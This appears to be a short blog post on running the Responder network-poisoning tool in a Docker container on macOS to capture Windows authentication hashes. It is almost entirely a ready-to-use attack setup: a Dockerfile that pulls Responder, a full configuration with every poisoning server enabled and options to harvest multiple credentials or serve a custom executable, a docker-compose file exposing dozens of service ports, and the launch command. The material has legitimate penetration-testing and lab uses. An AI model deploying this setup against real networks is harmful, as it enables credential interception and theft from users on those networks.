Responder on Docker Container
4 min readMar 30, 2024
Pwning hashes on MACOS as host and using docker without — host or — privileged flag. Since, host is already running multicast with 5353, we are using 5454 mapped to container 5353.
Dockerfile
FROM alpine:latest
# Install dependencies
RUN apk update && apk add --no-cache \
git \
python3 \
py3-pip \
py3-requests \
py3-beautifulsoup4 \
py3-ldap3 \
py3-cryptography \
py3-pycryptodomex \
py3-virtualenv \
gcc \
musl-dev \
python3-dev \
libffi-dev
# Clone Responder repository
RUN git clone https://github.com/lgandx/Responder.git /opt/Responder
# Set the working directory
WORKDIR /opt/Responder
# Create a virtual environment and activate it
RUN python3 -m venv venv
ENV PATH="/opt/Responder/venv/bin:$PATH"
# Install remaining Python dependencies using pip inside the virtual environment
RUN pip3 install --no-cache-dir \
netifaces \
pyopenssl \
pyasn1 \
dnslibResponder.conf
[Responder Core]
; Servers to start
SQL = On
SMB = On
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
DCERPC = On
WINRM = On
SNMP = Off
MQTT = Off
; Custom challenge.
; Use "Random" for generating a random challenge for each requests (Default)
Challenge = Random
; SQLite Database file
; Delete this file to re-capture previously captured hashes
Database = Responder.db
; Default log file
SessionLog = Responder-Session.log
; Poisoners log
PoisonersLog = Poisoners-Session.log
; Analyze mode log
AnalyzeLog = Analyzer-Session.log
; Dump Responder Config log:
ResponderConfigDump = Config-Responder.log
; Specific IP Addresses to respond to (default = All)
; Example: RespondTo = 10.20.1.100-150, 10.20.3.10
RespondTo =
#Bind_To = 172.25.0.2
; Specific NBT-NS/LLMNR names to respond to (default = All)
; Example: RespondTo = WPAD, DEV, PROD, SQLINT
;RespondToName = WPAD, DEV, PROD, SQLINT
RespondToName =
; Specific IP Addresses not to respond to (default = None)
; Example: DontRespondTo = 10.20.1.100-150, 10.20.3.10
DontRespondTo =
; Specific NBT-NS/LLMNR names not to respond to (default = None)
; Example: DontRespondTo = NAC, IPS, IDS
DontRespondToName = ISATAP
; If set to On, we will stop answering further requests from a host
; if a hash has been previously captured for this host.
AutoIgnoreAfterSuccess = Off
; If set to On, we will send ACCOUNT_DISABLED when the client tries
; to authenticate for the first time to try to get different credentials.
; This may break file serving and is useful only for hash capture
CaptureMultipleCredentials = On
; If set to On, we will write to file all hashes captured from the same host.
; In this case, Responder will log from 172.16.0.12 all user hashes: domain\toto,
; domain\popo, domain\zozo. Recommended value: On, capture everything.
CaptureMultipleHashFromSameHost = On
[HTTP Server]
; Set to On to always serve the custom EXE
Serve-Always = Off
; Set to On to replace any requested .exe with the custom EXE
Serve-Exe = Off
; Set to On to serve the custom HTML if the URL does not contain .exe
; Set to Off to inject the 'HTMLToInject' in web pages instead
Serve-Html = Off
; Custom HTML to serve
HtmlFilename = files/AccessDenied.html
; Custom EXE File to serve
ExeFilename = ;files/filetoserve.exe
; Name of the downloaded .exe that the client will see
ExeDownloadName = ProxyClient.exe
; Custom WPAD Script
; Only set one if you really know what you're doing. Responder is taking care of that and inject the right one, with your current IP address.
WPADScript =
; HTML answer to inject in HTTP responses (before </body> tag).
; leave empty if you want to use the default one (redirect to SMB on your IP address).
HTMLToInject =
[HTTPS Server]
; Configure SSL Certificates to use
SSLCert = certs/responder.crt
SSLKey = certs/responder.keydocker-compose.yml
version: '3'
services:
responder:
build: .
volumes:
- ./Responder.conf:/opt/Responder/Responder.conf
- ./logs:/opt/Responder/logs
ports:
- "80:80"
- "443:443"
- "137:137"
- "138:138"
- "139:139"
- "445:445"
- "389:389"
- "3268:3268"
- "88:88"
- "464:464"
- "53:53"
- "135:135"
- "1433:1433"
- "3389:3389"
- "21:21"
- "110:110"
- "143:143"
- "25:25"
- "5985:5985"
- "5986:5986"
- "547:547"
- "5353:5354"
- "5355:5355"
- "3260:3260"
- "5060:5060"
- "5061:5061"
# Updated command to use the correct options
command: python3 Responder.py -I eth0 -w -d
networks:
- responder_network
networks:
responder_network:
driver: bridgeFire up build
docker-compose up --build
[+] Building 1.0s (10/10) FINISHED docker:desktop-linux
=> [responder internal] load build definition from Dockerfile 0.0s
=> => transferring dockerfile: 782B 0.0s
=> [responder internal] load metadata for docker.io/library/alpine:lates 0.9s
=> [responder internal] load .dockerignore 0.0s
=> => transferring context: 2B 0.0s
=> [responder 1/6] FROM docker.io/library/alpine:latest@sha256:c5b1261d6 0.0s
=> CACHED [responder 2/6] RUN apk update && apk add --no-cache git 0.0s
=> CACHED [responder 3/6] RUN git clone https://github.com/lgandx/Respon 0.0s
=> CACHED [responder 4/6] WORKDIR /opt/Responder 0.0s
=> CACHED [responder 5/6] RUN python3 -m venv venv 0.0s
=> CACHED [responder 6/6] RUN pip3 install --no-cache-dir netifaces 0.0s
=> [responder] exporting to image 0.0s
=> => exporting layers 0.0s
=> => writing image sha256:9c3e54196093c0ba05d17a43bd898fd1c9aae2e7af95a 0.0s
=> => naming to docker.io/library/tmp-responder 0.0s
[+] Running 1/0
✔ Container tmp-responder-1 Recreated 0.0s
Attaching to responder-1To view the logs
cat ./logs/*.log